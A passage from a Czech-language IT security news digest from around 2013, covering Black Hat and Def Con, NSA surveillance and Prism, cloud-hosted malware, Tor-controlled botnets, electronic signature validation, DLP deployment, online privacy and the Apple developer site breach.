Wales britské vládě radí v otázce otevřeného přístupu občanů k informacím veřejné správy umístěným na internetu. Osobně však prý doufal, že mu David Cameron bude naslouchat i v jiných oblastech internetové problematiky.
Ve světle nedávných událostí Wales také řekl, že Wikipedia uvažuje o standardním používání zabezpečeného protokolu HTTPS pro uživatele editující stránky této encyklopedie. Chce je tak ochránit před možným špehováním ze strany americké organizace NSA.
„Žijeme v době, kdy musíme mnohem více myslet na naši bezpečnost. Jednou z hrozeb je i špehování lidí vládními organizacemi,“ řekl Wales.
Jak představitelé americké vlády lákají hackery
I během léta, kdy se řeší kauza Edwarda Snowdena, spolu hackeři a policisté mohou vycházet. Pro důkaz netřeba chodit daleko – nedávno se odehrály dvě velké každoroční konference zaměřené na počítačovou bezpečnost s názvem Black Hat a Def Con.
Hacking | Bezpečnost
Black Hatu se zúčastnilo více než 7500 lidí a Def Con zaznamenal dokonce 15 000 návštěvníků. Navzdory jistému napětí mezi účastníky kvůli aféře Snowdena, jenž vynesl tajná data z NSA, byla k vidění i setkání představitelů amerických vládních agentur s hackery.
Tři týdny před konáním konferencí Jeff Moss, jenž Def Con i Black Hat založil a v současné době vede Def Con, na blog napsal, že by si kvůli Snowdenově aféře měly obě strany dát nějaký čas od sebe pokoj. Později však Moss uvedl, že nemohl zakázat představitelům FBI účast na své konferenci, i když oni sami by si měli rozmyslet, zda je jejich přítomnost vhodná. A oni přišli.
Mluvčí NSA uvedla, že neví, kolik zaměstnanců U.S. Cyber Command, jednotky vedené ředitelem NSA generálem Keithem Alexanderem, se Black Hatu zúčastnilo. I tento rok se hrála známá hra s názvem Najdi federála, v rámci které účastníci konference mají identifikovat vládní zaměstnance a předat jim tričko, jež je má identifikovat. „Tento rok je jich tady opravdu hodně,“ řekl Christopher Cleary ze společnosti Vir-Sec. „Je velmi snadné je najít.“
Generál Alexander v neděli bránil techniky ohrožující soukromí běžných lidí, jež NSA používá, před několika tisíci účastníky Black Hat. Je pravdou, že občas z publika zazněly na jeho adresu nelichotivé komentáře. „Chápu ho,“ řekl Moss. „Jeho prací není obhajovat lidská práva.“ Řada hackerů však měla odlišný názor – USA podle nich takto plošným špehováním lidí prostě překročily určitou hranici.
Vztahy mezi oběma komunitami se za poslední dekádu utužily, když americká vláda začala upevňovat svou pozici na internetu. Do tradiční armády jsou třeba cvičení vojáci, ale kybernetickou armádu musí obsadit počítačoví experti – hackeři. Generál Rober Elder z amerického letectva byl proto jedním z mnoha vládních představitelů, kteří o víkendu měli prezentaci za účelem nabírání nových sil. Jakmile svou prezentaci dokončil, skupina mladých lidí si k němu šla pro další informace.
Je to však dvousečná zbraň: vláda sice získá zkušenosti nejlepších expertů, těm se však nemusejí líbit její cíle – jako v případě Snowdena. Na druhou stranu hackeři mohou používat nejlepší dostupnou techniku a provádět věci, které by jinak byly ilegální. A to většinu z nich k loajalitě pro americkou vládu nakonec přesvědčí.
Cloudové služby jsou zneužívány k šíření malwaru
Je hlášen výrazný nárůst případů, kdy autoři malwaru využívají služby jako Google Code jako distribučního kanálu.
IT | Viry | Kriminalita
Až dosud bylo obvyklé, že programátoři škodlivých programů své „produkty“ šířili z vlastních webů. Nyní je ale pozorován jejich masový přechod na komerční hostovací služby a cloudové služby, přinejmenším podle vystoupení bezpečnostních výzkumníků na konferenci Black Hat, která proběhla minulý týden.
Je to zřejmě způsobeno tím, jak se bezpečnostní řešení stále lépe dokáží vyrovnat s nebezpečnými servery. Ať u jejich detekcí či následným využíváním blacklistů, seznamů jednoznačně identifikovaných nebezpečných adres. Využívání komerčních serverů, jejichž adresy nelze jednoduše zakázat, není trend nový, je pozorováno víc než dva roky, ale podle bezpečnostních specialistů nyní prudce roste.
Nejčastěji vlastníci serverů nedokáží správně kontrolovat obsah, který poskytují. Jak říká Michael Sutton, viceprezident pro výzkum společnosti ZScaler, která nabízí bezpečnostní cloudové služby pro korporace: „Umístit na takové servery škodlivý kód je potom relativně snadné.“
U závadného obsahu šířeného z běžné komerční adresy je podstatně pravděpodobnější, že projde tradičními korporátními zabezpečeními. Výrobci také jen těžko budou na blacklist umisťovat legitimní hostovací společnosti, což současně vede k tomu, že škodlivý obsah na nich zůstává o to déle.
Sutton uvedl příklady z nedávné minulosti, kdy útočníci nahráli a distribuovali škodlivý kód pomocí služeb DropBox a Google Code. Na blogu firmy ZScaler je seznam téměř čtyřiceti závadných souborů hostovaných na webu Google Code, který jinak primárně nabízí nástroje pro softwarové vývojáře. Příklady nekorektních souborů na DropBoxu již neplatí a podle blogu již byly zřejmě odstraněny.
„Zpráva pro správce IT je jasná – nevěřte slepě doménám, které se zdají být bezpečné. Útočníci dnes sázejí na hostovací služby. Kdysi používali vlastní servery. Později infikovali obsah legitimních společností. Dnes využívají hostovacích společností. Za hostování malwaru již nemusí platit a mnohem méně jim hrozí zařazení do blacklistu.“
Ke stejným závěrům dochází i Firehost, provozovatel cloudových hostovacích služeb pro korporace. Podle jeho kvartální bezpečnostní analýzy výrazně vzrostl počet útoků typu SQL injection, directory traversal attacks a dalších, které přicházejí zevnitř sítí cloudových provozovatelů. Ti často nedostatečně prověřují nové zákazníky, což umožňuje vytvářet účty na základě falešných identit. Ty jsou potom často zneužívaný k spouštění a správě mohutných botnetů, které běží na cloudové infrastruktuře.
Firehost uvádí, že v druhém čtvrtletí roku 2013 filtrovací systém IP adres, který chrání jeho zákazníky, zablokoval přibližně 1,2 milionů jednotlivých útoků (do tohoto údaje nejsou započítány opakování téhož útoku). A z nich značná část pocházela právě z různých cloudových služeb.
Elektronický podpis – Není platnost jako ověření
Když ověřujeme elektronický podpis, je to proces složený z určitého počtu kroků. Pokud se nám podaří úspěšně provést všechny tyto kroky, můžeme konstatovat, že elektronický podpis byl ověřen.
Zabezpečení
Je to důležitá informace, která ale ještě neříká nic o výsledku: ověřili jsme podpis jako platný? Nebo jako neplatný? A co když se nám ověření nepodařilo?
Problematika ověřování platnosti elektronických podpisů je poměrně komplikovanou záležitostí. Její složitost přitom začíná už u správného vnímání základních pojmů, ke kterým patří termíny jako ověřování či ověření a platnost či neplatnost elektronického podpisu, elektronické značky či časového razítka. Mezi nimi je totiž zcela zásadní, až principiální rozdíl.
Ověřování je proces, platnost je výsledek Důležité je uvědomit si, že ověřování je proces, který někdo či něco vykonává, zatímco platnost či neplatnost jsou možné stavy elektronického podpisu. A obě tyto věci jsou na sobě nezávislé. Ten, kdo ověřuje elektronický podpis, se snaží dozvědět, jaký je stav elektronického podpisu (či značky nebo razítka). Pokud se mu to podaří, dozví se, že podpis je platný, nebo naopak že je neplatný. Ale může to dopadnout i tak, že se nic nedozví – že se mu nepodaří vykonat všechno, co je nutné k tomu, aby se spolehlivě dozvěděl, jaký je stav příslušného elektronického podpisu. Pak o něm ale nemůže tvrdit vůbec nic. Ani že je platný, ani že je neplatný.
Pamatujme si tedy, že naše zkoumání platnosti elektronického podpisu (jeho ověřování) může dopadnout třemi různými způsoby:
ověření se podařilo – a výsledkem je pozitivní zjištění, že podpis je platný
ověření se podařilo – a výsledkem je pozitivní zjištění, že podpis je neplatný
ověření se nezdařilo.
Takovéto zkoumání (ověřování) obvykle neděláme ručně, ale dělají jej za nás programy, které používáme pro práci s elektronickými podpisy. A tyto programy nám vždy nějak signalizují, kterým z výše uvedených způsobů ověření dopadlo. Ukažme si to na příkladu programu Adobe Reader (a stejně tak i Adobe Acrobat). Zelená „fajfka“ signalizuje zjištění, že podpis je platný. Červený křížek naopak ukazuje zjištění, že podpis je neplatný. Konečně žlutý trojúhelník s vykřičníkem signalizuje třetí možnost: kdy se ověření nezdařilo, a o platnosti či neplatnosti příslušného podpisu tudíž nic nevíme. Můžeme si to představit jako jakési pokrčení rameny: program neví (nedokázal ověřit podpis), a tak na nás krčí rameny.
Pro nás to musí znamenat, že se na takovýto podpis, o jehož platnosti nic nevíme, nemůžeme spoléhat. Nemůžeme jej považovat za platný a jednat podle toho. Tedy například provádět nějaké právní úkony opírající se o platnost takovéhoto podpisu. Pamatuje na to dokonce i zákon (č. 227/2000 Sb., o elektronickém podpisu), ve svém paragrafu 5, který říká, že pokud by tím vznikla nějaká škoda, půjde na vrub toho, kdo neprovedl vše potřebné pro zjištění stavu podpisu, a přesto jednal, jako kdyby podpis byl platný.
Stejně tak ale nemůžeme považovat takový podpis za neplatný. Pokud nejsme schopni zjistit, zda je či není platný, ještě nás to neopravňuje k tomu, abychom se k němu chovali, jako kdyby byl neplatný. Tedy například rušili dříve platně uzavřené smlouvy a požadovali vrácení do původního stavu. Již jen proto, že někdo jiný může být šikovnější a může se dopátrat toho, že podpis je platný. Třeba díky tomu, že má v ruce jiný exemplář elektronicky podepsané smlouvy, ke které bylo včas připojeno časové razítko (a tím byla prodloužena možnost ověření toho, že podpis je platný).
Jeden program, jeden podpis, tři různé výsledky Na závěr ještě jedna veledůležitá věc. Některým programům, jako třeba právě Adobe Readeru a Acrobatu, lze zakázat kontrolu některých z uvedených podmínek. Pak jejich splnění vůbec neověřují a jednají, jako kdyby splněné byly. To ale způsobuje, že jeden a tentýž program může stejný podpis na tomtéž dokumentu vyhodnotit diametrálně odlišně, v závislosti na svém nastavení. A samozřejmě také v závislosti na možnostech svého fungování.
To je ostatně i příklad dnešních tří obrázků. Správný výsledek je ten, který konstatuje neplatnost podpisu (protože je založen na již revokovaném certifikátu). Pokud ale měl Reader zakázáno revokaci kontrolovat, dospěl k závěru, že podpis je platný. A pokud revokaci kontrolovat měl, ale nedokázal tak učinit (protože neměl přístup k internetu), skončil s výsledkem „nevím“ (platnost podpisu je neznámá).
Šéf NSA říká: Nevěřte médiím
Šéf amerického úřadu NSA začal hledat pomoc u bezpečnostních profesionálů na konferenci Black Hat. Snaží se tak vysvětlit spoustu nejasností kolem odposlouchávání internetového provozu v rámci donedávna tajného projektu Prism.
Špionáž
„Jediný důvod proč tu jsem, je ten, že vás chci požádat, abyste nám pomohli zlepšit se,“ řekl generál Keith Alexander během svého úvodního proslovu na bezpečnostní konferenci, která je známá pro své briefingy o tom, jak se dostat do počítačových systémů a sítí.
Alexander na konferenci také řekl, že by rád vyložit fakta o kontroverzních sledovacích programech, mezi které patří i Prism, který nedávno odhalil externí zaměstnanec NSA Edward Snowden. Prism způsobil v USA rozhořčení převážně tím, že sbírá údaje o telefonních hovorech občanů USA. Zbytek světa zase odsuzuje lustrování dat uložených u amerických poskytovatelů služeb.
Podle Alexandra však data, která Prism sbírá, nezahrnují obsah telefonní konverzací a zpráv SMS, ale ani jména, adresy či obsah e-mailů. Data nasbíraná díky Prismu neobsahují ani údaje z kreditních karet nebo informace o lokaci uživatele. NSA sbírá pouze datum a čas hovorů, vytáčené telefonní číslo nebo IP adresu, délku hovoru nebo e-mail a původ metadat.
V NSA pracuje údajně pouze 22 lidí, kteří mohou schválit přidání telefonního čísla nebo e-mailového účtu do sledovací databáze, a 35 analytiků, kteří s touto databází mohou pracovat.
V roce 2012 bylo ke kontrole schváleno méně než 300 telefonních čísel. Jejich kontrola vyústila ve 12 záznamů, které byly předány FBI k dalšímu vyšetřování. Telefonní čísla a e-maily jsou zkoumány pouze v případě, že jsou spojeny s lidmi mimo území USA, kteří jsou podezřelí z terorizmu.
Alexander také dodal, že kongres zkontroloval data nasbíraná v uplynulých čtyřech letech a oznámil, že „nenašel žádné úmyslné porušení zákona.“ NSA byla podle Alexandra falešně obviněna z toho, že prohlíží veškerou komunikaci. „Ven se dostala informace o tom, že sbíráme vše. To není pravda,“ řekl. „Vytváříte si rychlé závěry na základě toho, co napsala média, a bez znalosti faktů. Žádám vás, abyste se na fakta podívali.“
Alexander popsal zaměstnance NSA jako ušlechtilé lidi, kteří jsou trénování k tomu, aby dohled prováděli v souladu se zákony. Vše probíhá pod dohledem soudů, kongresu, prezidentské pobočky a také přes interní hodnocení, která zabraňují zneužití moci. Data od poskytovatelů internetových a komunikačních služeb získala NSA na základě soudních příkazů. „Nikdo z NSA nikdy nepřekročil hranice, které nám byly dány,“ dodal Alexander.
Někteří kritici tvrdí, že by NSA mohla směrnice zneužít. „Hm, to by sice mohla, ale pravda je taková, že se nic takového neděje,“ tvrdí generál.
Díky programu bylo podle Alexandra zastaveno 54 aktivit spojených s terorizmem, s toho se 13 týkalo USA. Do Afganistánu a Iráku poslala agentura více než 6000 svých zaměstnanců, aby síť na sbírání dat nastavili. Dvacet z nich při tomto úkolu zemřelo, řekl Alexander.
Šéf NSA byl při svém projevu přerušen výkřikem z publika: „Přečtěte si ústavu,“ který vyvolal rozptýlený potlesk. „Přečetl jsem. A vy byste měli také,“ odpověděl Alexander.
Únik informací, za kterým stál Snowden, údajně oslabil bezpečnost Spojených států tím, že nepřátelům poskytl informace o tom, jaké nástroje má USA k dispozici. „Škody způsobené naší zemi jsou velké a nezvratné,“ řekl a citoval, že Prism zabránil teroristickému útoku ve 42 případech z 54. „Pokud by byly tyto útoky úspěšně provedeny, jaký by to asi mělo vliv na občanská práva?“ zeptal se nakonec.
Ochrana soukromí – komunikace a zachování soukromí
Je možné komunikovat v globálně propojeném světě a zároveň si zachovat své soukromí?
Bezpečnost
Fotka oběda, naštvaný post na zdi, rychlé přeposlání nejžhavější novinky dne z oblíbeného zpravodajského serveru nebo tweet o tom, že mi právě ujela tramvaj. Soukromé informace se na síti válejí všude kolem… Stačí, když je někdo posbírá, a hned ví, kdo vlastně jste. Dá se tedy ještě dnes vůbec říci, že existuje on-line soukromí? Odborník na bezpečnost Steve Rambam z agentury Pallorium radikálně prohlašuje, že „soukromí je prostě mrtvé, takže se s tím smiřte.“
Problematické jsou hlavně chytré mobilní telefony, na nichž je možné být neustále on-line. Člověka to pak nutí neustále o sobě zveřejňovat nějaké informace – třeba právě při čekání na další tramvaj. Existují i uživatelé, kteří svůj smartphone prostě nedají z ruky. Podle průzkumu společnosti 11Mark z ledna 2012 si 75 % uživatelů bere svůj smartphone s sebou i na toaletu. Penetrace globálního veřejného světa do soukromé sféry, potřeba sdílet své soukromé já s ostatními tedy den ode dne roste.
Simon to rozjel Pionýrské období se pro chytré telefony datuje do počátku devadesátých let minulého století. V roce 1992 představila společnost IBM na počítačovém veletrhu COMDEX koncept tzv. osobního komunikátoru jménem Simon. O dva roky později se Simon, který kombinoval mobilní telefon, pager a fax, prodával již ve 190 amerických městech. Už devatenáct let po Simonově debutu předstihl celosvětově počet prodaných chytrých telefonů množství prodaných počítačů.
Vlády a parlamenty se snažily dát komunikaci legislativní rámec již od třicátých let. Šedesát dva let například vydržel americký The Communications Act z roku 1934, který byl změněn až v roce 1996 v době prezidentského úřadu Billa Clintona. Jakkoliv byla jeho administrativa vizionářská, v tomto zákoně úplně ignorovala existenci chytrých telefonů, a tedy i možné problematické otázky on-line soukromí.
Trvalo to ještě několik let, než se americká administrativa jako první začala fenoménem on-line soukromí zabývat. Dne 30. ledna 2012 dal podnět k diskuzi americký kongresman Ed Markey, když připravil první verzi tzv. The Mobile Device Privacy Act. Kongresman požadoval mimo jiné podrobné zveřejnění monitorovacích softwarů pro mobilní telefony a také souhlas uživatele předtím, než bude monitorován a jeho data přeposílána třetí straně.
V EU se na to jde jinak Svůj pohled na věc on-line soukromí má i Evropská unie, která 25. ledna 2012 prezentovala návrh regulace založený na ochraně on-line soukromí. A to pomocí legislativní úpravy zakazující „kontrolorovi dat“ – např. majiteli webové stránky nebo poskytovateli internetové reklamy, aby sbíral data uživatelů internetu bez jejich výslovného souhlasu.
Diskutované návrhy EU a USA vystihují dva odlišné pohledy na ochranu on-line soukromí, je ovšem možné nastavit i třetí přístup. Ten nabízí individuálnímu uživateli možnost ovládat své soukromí tím, že mu umožňuje zvolit si, kdy, kde a jak bude zasahováno do jeho on-line soukromí. Má totiž na něm vyšší zájem než vláda nebo průmyslová sféra. Chce si sám určovat, jak se bude s jeho on-line soukromím nakládat.
Třetí přístup by měl výhody pro všechny zúčastněné strany. Není třeba, aby se vláda snažila vymyslet jeden regulační model, který bude vyhovovat všem (což je, jak známo, práce vskutku sisyfovská) ani to nijak na druhé straně neomezuje internetovou reklamu. Uživatelé mají díky on-line behaviorální reklamě možnost dostávat jen sdělení, která by je mohla zajímat, a nerozptylují se jinými. A zadavatel reklamy je spokojený, protože se jeho sdělení dostávají k potenciálním zákazníkům.
Jak zvládnout počítače na tělo ve firmách
V současné době se začínají čím dál více rozmáhat chytrá zařízení, která si jde obléct na sebe – ať už hodinky či brýle. Jaká rizika však představují pro vaši společnost?
Zabezpečení | IT
O standardu BYOD (používání vlastních zařízení zaměstnanci) se debatuje v řadě organizací, které chtějí ušetřit, již delší dobu. Pravdou je, že BYOD je ve firemním prostředí v současné době trendem, jenž nejde zastavit, a podle analytiků se dá spíše očekávat, že se bude ještě dále rozšiřovat. Opravdovou hrozbou pro firmy, které potřebují chránit své duševní vlastnictví, jsou rizika, která přinášejí nové technologie. I když snadno dostupné cloudové řešení pro ukládání dat může představovat určitou hrozbu, průniky do nich nejsou příliš časté.
Společnosti by měly aktivně vytvářet svou bezpečnostní politiku a regulovat množství procesů uvnitř organizace, aby všechna možná rizika co možná nejvíce zredukovaly. V dnešní době se pomalu začíná rozmáhat nový trend - chytré hodinky či high-tech brýle typu Google Glass (technologie na tělo, wereable technologies). Tato zařízení v sobě mají připojení k internetu, software a umí toho čím dál více. Jejich využívání v organizaci může vyvolat obavy z porušení soukromí ostatních pracovníků nebo krádeže dat a mělo by proto být patřičně regulováno.
Zakázat používání nové a rozvíjející se technologie nejspíše nebude příliš efektivní. Měli byste však začít tím, že spolu s technologiemi se bude vyvíjet i vaše interní bezpečnostní politika a zaměstnanci se budou patřičně vzdělávat.
Ve své firmě byste proto měli zvážit tyto body: 1. Nejde o problém, který by mělo řešit vaše odděleníIT Oddělení IT nemá žádnou reálnou kontrolu nad tím, kdo si přinese na pracoviště které technologie a jak je využívá. Jde o organizační problém, který vyžaduje organizační řešení. Kromě manažera IT nebo ředitele pro informatiku by danou věc měla řešit i další výkonná osoba.
2. Ovlivněte nenápadně chování zaměstnanců Poptávka po užitečných, inovativních spotřebitelských technologiích nikdy nekončí. Ti zaměstnanci, kteří se o danou věc ze světa IT budou zajímat a se svými spolupracovníky o ní mluvit, mohou v rámci organizace ostatní náležitě ovlivňovat.
3. Nezaměřujte se na technická, ale systémová rizika Je asi dobré ujistit se, že manažeři ve vaší organizaci chápou klíčový rozdíl mezi systémovým (je třeba řešit komplexně procesy uvnitř organizace) a technických rizikem.
Závěrem lze jen opět zdůraznit, že technologie, které si lze obléci na sebe (ať už půjde o hodinky, brýle či náramek) se začínají teprve rozmáhat a je potřeba, aby organizace tomuto trendu porozuměly a nespoléhaly se pouze na řešení oddělení IT jen proto, že tato zařízení využívají internet.
Zločinecké gangy zneužívají síť Tor k ovládání botnetů
Výzkumníci firmy ESET objevili dva nové malwary, které mají ovládací centrum skryté v anonymizační síti Tor.
Kriminalita | BotNet
Programátoři různých zločineckých gangů stále častěji využívají možností anonymizační sítě Tor jako řešení pro ukrytí skutečného umístění jejich řídících serverů. Uvedla to firma ESET, jejíž výzkumný tým v nedávné době našel dva nové malwarové programy typu „botnet“ – jejichž řídící servery byly nastaveny jako tzv. skrytá služba Tor. Protokol „Tor Hidden service“ umožňuje uživatelům nastavovat služby – většinou servery WWW –, které nemají jednoduše odhalitelnou IP adresu a lze k nim přistupovat pouze pomocí náhodně vypadajícího názvu končícího příponou .onion.
Tento protokol byl navržen s cílem zamaskovat skutečnou adresu IP ukrývané služby serveru a současně ukrýt adresy IP klientů před serverem. Je tak prakticky nemožné pro obě strany, službu provozující i službu využívající, zjistit umístění nebo identitu svého protějšku. Komunikace mezi klientem Tor a skrytou službou Tor je šifrována a náhodně směrována mezi sérií počítačů, které jsou součástí sítě a slouží jako směrovače.
Použití sítě Tor pro hostování řídících serverů není zcela nová myšlenka. Možnosti tohoto přístupu byly diskutovány v prezentaci na bezpečnostní konferenci DefCon 8 v roce 2010. Praktická implementace konceptu byla odhalena loni v prosinci, kdy bezpečnostní firma Rapid7 identifikovala botnet Skynet složený ze 12 až 15 tisíc napadených počítačů, které přijímaly příkazy ze serveru IRC (Internet Relay Chat) běžícího právě jako skrytá služba Tor. Prezentující na konferenci varovali, že taková architektura se bude objevovat stále častěji. Dva nové botnety objevené ESETem ukazují, že tato předpověď byla pravdivá.
Na rozdíl od Skynetu oba botnety (postavené na malwaru Win32/Atrax a Win32/Agent.PTA) využívají řídícího serveru WWW. Atrax stahuje, spouští a vkládá infikované soubory do webového prohlížeče. Funkce mohou být rozšiřovány pomocí zásuvných modulů, které jsou lokálně šifrovány pomocí klíče AES generovaného z hardwarových parametrů každého infikovaného počítače. Atrax obsahuje klienta sítě Tor, který moduly doinstalovává do prohlížeče napadaného počítače a další komunikace malwaru je potom směrována do sítě Tor.
Agent.PTA je součástí rodiny malwaru, která je známá od roku 2012, ale funkce související se sítí Tor jsou nové. Stejně jako Atrax Agent.PTA dokáže krást obsah formulářů a ze sítě Tor si může průběžně stahovat nové funkce.
Nicméně, i když je obtížné najít skutečné adresy IP řídících serverů, je podle bezpečnostních expertů stále ještě možné analyzovat komunikační protokol malwaru a případně nad botnetem převzít kontrolu.
Manažer bezpečnosti: Rychlé nasazení DLP
Náš manažer bezpečnosti dostane ke svému současnému rozpočtu další finanční prostředky pro nasazení DLP. Tyto finance je však nutné investovat do několika týdnů.
Bezpečnost
Trouble Ticket Co řešit: Vedení firmy poskytlo finance, ale v omezené míře a s nedostatkem času. Akční plán: Během několika málo týdnů posoudit technologie, vybrat nástroj a zakoupit ho – na chyby není čas.
Dostal jsem většinu toho, o co jsem žádal, a dostal jsem to brzy. To zní dobře, ne? Ne tak docela.
Ve svém plánu na rok 2013 jsem požádal o rozpočet na systém ochrany před únikem dat (DLP). Měl jsem důvod se domnívat, že mám slušnou šanci na získání finančních prostředků. Do mé kompetence patří ochrana duševního vlastnictví naší společnosti a systém DLP byl pro vysoké manažery žhavým tématem.
Teď jsem se dozvěděl, že dostanu část svého požadavku z rozpočtu, ale ne v roce 2013. Přidalo se to ke zbývajícímu rozpočtu na rok 2012. To znamená, že musím koupit nástroj DLP ještě před koncem tohoto fiskálního roku.
Vypadá to, že vysocí manažeři jsou již přesvědčeni o tom, že nástroj DLP bude cenným přírůstkem našeho arzenálu zabezpečení, a rozhodli se, že čím dříve ho nasadíme, tím lépe. Dobrou zprávou je, že exekutiva bere ochranu informací vážně.
Tou špatnou je, že nechápou, že před samotným rozhodnutím je potřeba mít dostatek času k prostudování technologie. Pokud budete spěchat, můžete skončit s něčím, co vaše problémy dostatečně neřeší.
Můj původní plán byl najmout dva analytiky DLP a pracovat s nimi na ověření konceptu. Omezený rozpočet znamená, že si mohu najmout jen jednoho analytika, ale časové omezení situaci ještě zhoršuje. Máme jen dva měsíce na formální ověření konceptu – dva měsíce, které jsou navíc v době dovolených.
A co víc, nemám rozpočet ani personál na podporu komplexního nasazení DLP.
Naše implementace by kombinovala síťové DLP s detekcí a technologií pro koncové body. Se síťovým DLP nadefinujete data pro monitorování a poté jste upozorněni, když něco z toho opouští společnost, ať už je to přes e-mail Microsoft Exchange, webový e-mail, upload souborů, sociální média, FTP nebo jakoukoli jinou metodou.
Jak již název napovídá, síťový systém DLP monitoruje pouze provoz v síti. Pokud se definují data v notebooku, který se ocitne mimo síť, nezjistíte nic. DLP pro koncové body rozšiřuje příslušné bezpečnostní zásady i na zařízení, která mohou pracovat mimo síť.
Detekovací DLP zase umožňuje určit, kde všude se citlivé informace vyskytují, a upozorní vás, když jsou některá z těchto dat přesouvána nebo se vyskytují někde, kde by být neměla.
S poskytnutým rozpočtem a nedostatkem času bude naše úvodní nasazení omezeno na síťové DLP v našich třech největších lokalitách. Není to sice 100% pokrytí, ale je tomu docela blízko. Budu také moci využít své vlastní zkušenosti, protože v minulosti jsem DLP už úspěšně nasazoval.
V příštích několika týdnech provedeme omezené ověření konceptu a požádáme dodavatele o konfiguraci prostředí pro testování. To všechno nám ale neponechá příliš mnoho času na samotný výběr, vyjednání ceny a kontrolu smlouvy právním oddělením.
Realizace DLP Pokud se vše stihne včas, můžeme v novém fiskálním roce začít s konfigurací nového nástroje. Očekávám, že bude potřeba vytvořit nějaká počáteční strukturovaná pravidla, která budou pátrat po datech, jako jsou čísla kreditních karet, rodná čísla či některé části zdrojových kódů.
Také použiji klíčová slova jako krycí a pracovní názvy fúzí a akvizic, které by se mohly chystat, takže systém DLP je bude hledat ve veškeré komunikaci. Pro nestrukturovaná data vytvořím chráněné adresáře pro každý větší firemní útvar. Příslušná oddělení pak označí všechna pro ně citlivá data a uloží jejich kopii ve svých adresářích.
Jakmile se tyto dokumenty vytvoří, budeme sledovat síť, zda z ní neunikají nežádoucí data. Případné bezpečnostní incidenty spustí oznámení, které se odešle osobě odpovědné za přezkoumání alarmů, a ta určí, zda situace vyžaduje nějakou další akci.
Ochrana soukromí: Po digitálních stopách
Jedním z nejnovějších trendů v on-line komunikaci je sledování uživatelů – jejich digitální stopy. Co na webu dělají, jaké mají zájmy, kdo jsou, co dělají, co hledají, co je baví… Jak si hlídat vlastní digitální stopu?
Zabezpečení
Všudypřítomná reklama se na internetu snad ani nedá přehlédnout. Pokud se pohybujete ve webovém světě častěji a navštěvujete různé stránky, možná už jste si také všimli, že vám na různých stránkách vyskakují stále stejná nebo velmi podobná reklamní sdělení. Velmi často se stává, že jsou „jako by šitá na míru“ – mužům se objevují reklamy na auta, adrenalinové zážitky, ženám zase informace o dietách a slevách na boty. Tato cílená reklama je jedním z důsledků sbírání dat o uživatelích.
Každý uživatel po sobě na webové stránce zanechává otisk, svoji stopu, podle které se dá poznat, co ho zajímá, zda se chystá na dovolenou, zda hledá nové bydlení, dá se odhadnout, kolik mu je přibližně let, jeho pohlaví apod. Dnes je opravdu běžné, že webová stránka sbírá data o svých uživatelích. I když nemusí jít o nic špatného, některé stránky sdílejí uživatelská data s někým dalším.
Uživatelé i tvůrci pravidel on-line soukromí se proto o tyto praktiky čím dál více zajímají. Tato forma sledování umožňuje například právě zadavatelům reklamy sledovat uživatele na internetu a doručovat jim cílené reklamní obsahy přes různé stránky způsobem, kterého si uživatelé nejsou vědomi.
Nejde tedy o to, že by kradli uživatelům hesla, přístupové kódy nebo data z internetového bankovnictví, „jen“ sbírají jejich digitální stopy, o čemž uživatelé mnohdy ani nevědí. A to není vše.
Existují i další on-line technologie, které sledují aktivity na internetu, jde například o tlačítka na sociálních webech nebo webovou analytickou službu, která poskytuje data o návštěvnících webových stránek vlastníkovi stránek.
Neúmyslné přivedení na stopu Poskytnout někomu možnost sledovat virtuální stopu může tedy uživatel naprosto neúmyslně. Například jako vedlejší efekt některé technologie, kterou využívá, nebo prostřednictvím dat, jež stáhl do počítače a která umožňují takové sledování.
Jaké prostředky má uživatel k dispozici, když chce zjistit, zda a kdo sleduje jeho digitální stopu? První možností, kterou zvládne i méně zkušený uživatel, je nainstalování internetového bezpečnostního softwaru, který nabízí službu „do not track“ – funkci, jež poradí, jak blokovat přístup třetích stran, které uživatele sledují.
Dále může zkusit vyhledat rozšíření pro svůj prohlížeč s použitím klíčového slova „privacy“ – je zde mnoho užitečných plug-inů, které mohou pomoci minimalizovat sledování uživatelovy stopy. Poměrně jednoduchou záležitostí je i odstranění starých cookies z počítače – ovšem než to uživatel provede, měl by mít na paměti, že budou zapomenuta všechna data v nich uložená, a bude se proto muset znovu přihlašovat do různých systémů.
Existují dva typy služby „do not track“ – pasivní a aktivní. Pasivní funkce byla představena již na konsorciu World Wide Web (W3C), tato funkce je ovšem závislá na uživatelově dobrovolném používání. Servisní balíček W3C je součástí základního nastavení. Vzhledem k tomu, že je jeho dodržování dobrovolné, neposkytuje uživateli opravdovou kontrolu nad sběrem dat.
Naproti tomu aktivní prvek přináší aktivní kontrolu on-line soukromí pro většinového uživatele. Informuje ho a nabízí mu možnost blokovat sledování soustavně nebo ho zapínat a vypínat podle potřeby.
Apple obnovil základní části webu pro vývojáře
Po více než týdenní odstávce vynucené úspěšným napadením vývojářských serverů je možné získat přístup ke klíčovým částem serveru. Vývojáři se dostanou do vývojářských center jednotlivých systémů a mohou si i stahovat všechny nástroje.
Incidenty
Společnost z pátku na sobotu tohoto týdne částečně obnovila provoz, a to plných 8 dní po jejich nuceném odstavení. Přístupné jsou všechny segmenty, tedy pro systémy iOS a OS X i prohlížeč Safari. K dispozici je i správa digitálních certifikátů a systém správy chyb. Zhruba polovina webu je však stále mimo provoz, včetně diskuzních fór, kde si vývojáři vyměňují zkušenosti mezi sebou.
Po obnovení provozu center pro vývojáře a stahování softwaru získali všichni registrovaní (a platící) uživatelé znovu přístup k vývojářským aplikacím a také k testovací verzi připravovaného mobilního systému iOS 7 i příští verzi desktopového systému OS X Mavericks, které by se ke koncovým zákazníkům měly dostat letos na podzim.
Centrum pro vývojáře bylo odstaveno od internetu 18. července bez udání důvodu. Když se Applu stále nedařilo situaci rychle vyřešit, nakonec 22. července přiznal, že se „útočník [sic] pokusil získat osobní údaje našich registrovaných vývojářů z našeho webu pro vývojáře.“
Společnost dodala, že „citlivé osobní informace“ byly zašifrované a nehrozí proto nebezpečí jejich získání, ale že se útočníkovi podařilo získat jména vývojářů, jejich e-mailové i klasické poštovní adresy. Apple onoho útočníka neidentifikoval a neprozradil ani, jak se mu podařilo získat přístup k tomuto důležitému serveru.
K odpovědnosti za útok se přihlásil údajný bezpečnostní konzultant Ibrahim Baliç, na vysvětlenou ovšem dodal, že při testování slabých míst v online službách Applu narazil na bezpečnostní slabinu, kterou vzápětí společnosti ohlásil. Podle Baliçe odstavil Apple weby téměř okamžitě po jeho oznámení. Baliç podle svých slov pokračoval ve sběru osobních údajů i poté, co chybu ohlásil.
